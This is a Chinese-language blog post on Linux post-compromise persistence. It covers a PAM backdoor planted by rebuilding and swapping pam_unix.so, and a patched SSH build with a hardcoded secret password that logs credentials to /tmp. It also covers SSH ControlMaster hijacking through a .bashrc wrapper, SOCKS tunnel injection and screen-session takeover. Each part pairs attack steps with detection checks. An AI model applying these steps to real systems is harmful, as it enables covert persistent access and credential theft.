|
catalog0. 引言1. Pam后门2. SSH后门3. Hijacking SSH4. Hijacking SSH By Setup A Tunnel Which Allows Multiple Sessions Over The Same SSH Connection Without Re-Authentication5. Hijacking Active SSH Screen Sessions0. 引言0x1: 安全攻防观点1. Know Your Enemy : Know Your System//客户端攻防的战场主要在操作系统层面,同时也包括了和系统衔接的WEB、远程LOGIN等模块,了解它们的特性(尤其是高性能、边缘特性)才能更好地作出针对性的防御2. Effectivness != Complexity//攻防是一个整体性的工程化项目,任何一个维度的漏洞都能够导致被黑客入侵,因此并一定说内核攻防就比应用层攻防重要,它们是同等重要的。攻防手段的有效性并不一定需要通过复杂性来保证3. Everything Is A Weapon//内力所到之处,皆为兵刃,对于操作系统的任何一个特性,只要找到正确的使用方法和组合模式,都极有可能形成一条入侵向量0x2: Attacker vs Defender1. For the Attacker:Use System Builtin's to Simulate Rootkit Functionality. 尽量做到润物细无声,即把rootkit伪装成系统正常的工具、行为Stop relying on tools: 'Master the environment.'2. For the Defender:Know Your System, Before I Use it Against You.Thinking like an attacker: 'Flip the evil bit.'Relevant Link:https://www.blacklodgeresearch.org/files/7613/6963/4840/Poor_Mans_Root_Kit_BLR_talk_PUBLIC_2013.pdf1. Pam后门PAM(插入式验证模块(Pluggable Authentication Module,PAM))简单来说,就是提供了一组身份验证、密码验证的统一抽象接口,应用程序员可以使用这些API接口来实现与安全性相关的功能,PAM可以作为Linux登录验证(包括SSH)的统一验证入口点,也同样出于一点,黑客可以利用PAM部署SSH代码级的逻辑后门0x1: 查询本机的PAM版本0x2: 下载对应的源代码文件http://pkgs.fedoraproject.org/repo/pkgs/pam/Linux-PAM-0.99.6.2.tar.bz2/52844c64efa6f8b6a9ed702eec341a4c/http://www.linux-pam.org/pre/history/http://www.linux-pam.org/pre/library/0x3: 对原始的PAM so文件进行备份cd /lib64/securityll pam_unix.somv pam_unix.so pam_unix.so.bak0x4: 修改源文件,添加逻辑后门cd /zhenghan/pam-backdoor/Linux-PAM-0.99.6.2/modules/pam_unixvim pam_unix_auth.c0x5: 重新编译pam模块cd /zhenghan/pam-backdoor/Linux-PAM-0.99.6.2/./configuremake0x6: 使用包含逻辑后门的pam模块替换系统默认的pam模块cp /zhenghan/pam-backdoor/Linux-PAM-0.99.6.2/modules/pam_unix/.libs/pam_unix.so /lib64/security/pam_unix.so0x7: 测试后门1. 使用正常root帐号、密码登录2. 使用root帐号,后门密码(pam)进行隐藏登录0x8: 对抗检测方法pam_unix是系统原生的模块,可以使用RPM的校验机制进行篡改检测1. rpm校验已安装包是否被修改rpm -qV pam....L.... c /etc/pam.d/fingerprint-auth....L.... c /etc/pam.d/password-auth....L.... c /etc/pam.d/smartcard-auth....L.... c /etc/pam.d/system-authS.?...... /lib64/libpam.so.0.82.2S.?...... /lib64/libpam_misc.so.0.82.0S.5....T. /lib64/security/pam_unix.so结果含义/*如果一切均校验正常将不会产生任何输出。如果有不一致的地方,就会显示出来。输出格式1. 8位长字符串: 8位字符的每一个 用以表示文件与RPM数据库中一种属性的比较结果('.'表示检测通过) 1) S: 文件大小 2) M: 模式e (包括权限和文件类型) 3) 5: 校验和(md5)、?: 文件不可读 4) D: 设备 5) L: 符号链接 6) U: 用户 7) G: 组 8) T: 文件修改时间2. c: 用以指配置文件3. 文件名*/从二进制的角度来看,被植入了代码级逻辑后门的so文件可以被当成病毒处理,通过提取逻辑后门附近的二进制特征码,加入杀毒特征库,可以实现对此类后门的查杀,并禁止其被ssh加载1. 提取包含逻辑后门的pam_unix.so的特征码2. 加入杀毒特征库3. 禁止逻辑后门pam_unix.so模块被ssh进程加载Relevant Link:http://w ww.csdn123.com/html/itweb/20130911/112822_112821_112829.htmhttp://www.cnblogs.com/LittleHann/p/3662161.htmlhttp://bobao.360.cn/learning/detail/454.htmlhttp://www.awaysoft.com/taor/rpm%E6%A0%A1%E9%AA%8C%E5%B7%B2%E5%AE%89%E8%A3%85%E5%8C%85%E6%98%AF%E5%90%A6%E8%A2%AB%E4%BF%AE%E6%94%B9.html2. SSH后门vi includes.h //修改后门密码,记录文件位置,/*+#define ILOG '/tmp/ilog' //记录登录到本机的用户名和密码+#define OLOG '/tmp/olog' //记录本机登录到远程的用户名和密码+#define SECRETPW '123456654321' //后门的密码*/0x1: 后门行为1. 黑客使用设置的后门密码可以直接跨越验证逻辑登录2. 管理员用root、其他帐号的登录全部会被秘密记录下来,相当于key logger0x2: 对抗检测方法1. rpm校验已安装包是否被修改2. 提取包含逻辑后门的恶意ssh二进制特征Relevant Link:http://www.freebuf.com/tools/10474.html3. Hijacking SSHSSH can also be used to gather inteligence about other potential targets on the network,every time a user connects to a system using SSH a file is created in $HOME/.ssh/ called known_hosts,by examining this file an attacker can see other hosts that trusts the user在黑客控制了一台用户机器之后,通过查看known_hosts收集信息,将有可能获取到当前主机连接的下一台跳板机、内网、DMZ机器,以此扩大攻击面Relevant Link:https://www.defcon.org/images/defcon-15/dc15-presentations/Moore_and_Valsmith/Whitepaper/dc-15-moore_and_valsmith-WP.pdf4. Hijacking SSH By Setup A Tunnel Which Allows Multiple Sessions Over The Same SSH Connection Without Re-Authentication0x1: SSH multiplexingMultiplexing is the ability to send more than one signal over a single line or connection. With multiplexing, OpenSSH can re-use an existing TCP connection for multiple concurrent SSH sessions rather than creating a new one each time.1. the overhead of creating new TCP connections is eliminated. The overall number of connections that a machine may accept is a finite resource and the limit is more noticeable on some machines than on others, and varies greatly depending on both load and usage. 2. with multiplexing only a single TCP connection is set up and used regardless of whether or not there are multiple SSH sessions carried over it.3. multiplexed connection技术可以显著减少ssh连接时间0x2: Setting Up Multiplexing需要明白的是,SSH劫持是发生在被黑客控制的机器上,黑客通过SSH劫持,希望能够无密码获得当前用户连接的下一台机器。因此,黑客需要修改的配置文件是受控制的用户机器上的配置文件1. ControlMaster: determines whether ssh will listen for control connections and what to do about them. 2. ControlPath: is the location for the control socket used by the multiplexed sessionsv3. ControlPersist: can be used in conjunction with ControlMaster. 1) If set to 'yes', it will leave the master connection open in the background indefinitely to accept new connections until either killed explicitly or closed with -O.//Control sockets are removed automatically when the master connection is ended. 1. 攻击者有root权限vim /etc/ssh/ssh_config/*..ControlPath /tmp/%r@%h:%pControlMaster autoControlPersist yes..*/开启了ControlMaster模式之后,如果当前用户已经成功登录过一次目标机器(例如远程跳板机、DMZ机器),则黑客可以利用Multiplexing技术直接'无密码'登录同样的那台服务器,简单来说,SSH的密码验证是基于TCP Connection级别的,而不是会话Session界别的,当发生Multiplexing的时候,黑客的Session可以直接绕过任何的登录验证2. 攻击者没有root权限vim $HOME/.ssh/config/*..ControlPath /tmp/%r@%h:%pControlMaster autoControlPersist yes..*/3. 在.bashrc里封装ssh命令vim $HOMW/.bashrc/*..ssh () { /usr/bin/ssh -o 'ControlMaster=auto' -o 'ControlPath=/tmp/%r@%h:%p' -o 'ControlPersist=yes' '$@';}..*/利用了Linux Bash的自定义函数的方式、SSH动态配置参数的特性实现了开启ControlMaster模式0x3: 攻击者复用Multiplexing模式下的Socket会话进行SSH连接These settings will cause all new SSH sessions to create a persistent brokering master socket.I've used %h in control socket commands to represent the target host, %h can be any char(s).This socket can be used to create further sessions, without credentials, even after the original user exits their session.0x4: Adding a dynamic tunnel we can create a dynamic tunnel inside an existing master socketlsof -i TCP:9090ssh -O forward -D 9090 -S /tmp/[email protected]:22 %hlsof -i TCP:9090通过注入命令实现端口转发,执行完这条命令后,我们就可以使用这台机器的9090端口做SOCKS5代理,访问下一跳的网段0x5: 前面说过,如果ControlPersist为yes,则不会自动删除sockets文件,我们可以手工rm删除/tmp/[email protected]:22,也可以优雅的使用ssh -O exit -S /tmp/[email protected]:22 %h0x6: 对抗检测方法1. 检查ssh的配置文件中,是否开启了ControlMaster模式 1) /etc/ssh/ssh_config 2) $HOME/.ssh/config2. 检查bash自定义函数中是否有ssh()劫持set | grep 'ssh()'Relevant Link:https://en.wikibooks.org/wiki/OpenSSH/Cookbook/Multiplexinghttp://unix.stackexchange.com/questions/22965/limits-of-ssh-multiplexinghttp://www.anchor.com.au/blog/2010/02/ssh-controlmaster-the-good-the-bad-the-ugly/ http://www.revsys.com/writings/quicktips/ssh-faster-connections.html5. Hijacking Active SSH Screen Sessionsssh_user用户使用screen管理ssh会话时的情景1. 当ssh_user使用screen ssh [email protected]连接远程的'112.124.20.20'时,会在/var/run/screen有显示相应的文件2. ls -la /var/run/screen/可以用screen -r root/来接管会话 注入screen的ssh会话,会有一个不好的地方,就是你敲的命令,会在当前正在连接的用户那里同时显示,容易被发现0x1: 对抗检测方法1. 检测/var/run/screen/是否包含screen会话,这从某种程度上算是一种可疑事件Relevant Link:http://0xthem.blogspot.com/2015/03/hijacking-ssh-to-inject-port-forwards.htmlhttp://drops.wooyun.org/tips/5253Copyright (c) 2015 Little5ann All rights reserved
(以上内容不代表本站观点。) --------------------------------- |
本網站是"非商業"(non-commercial)。
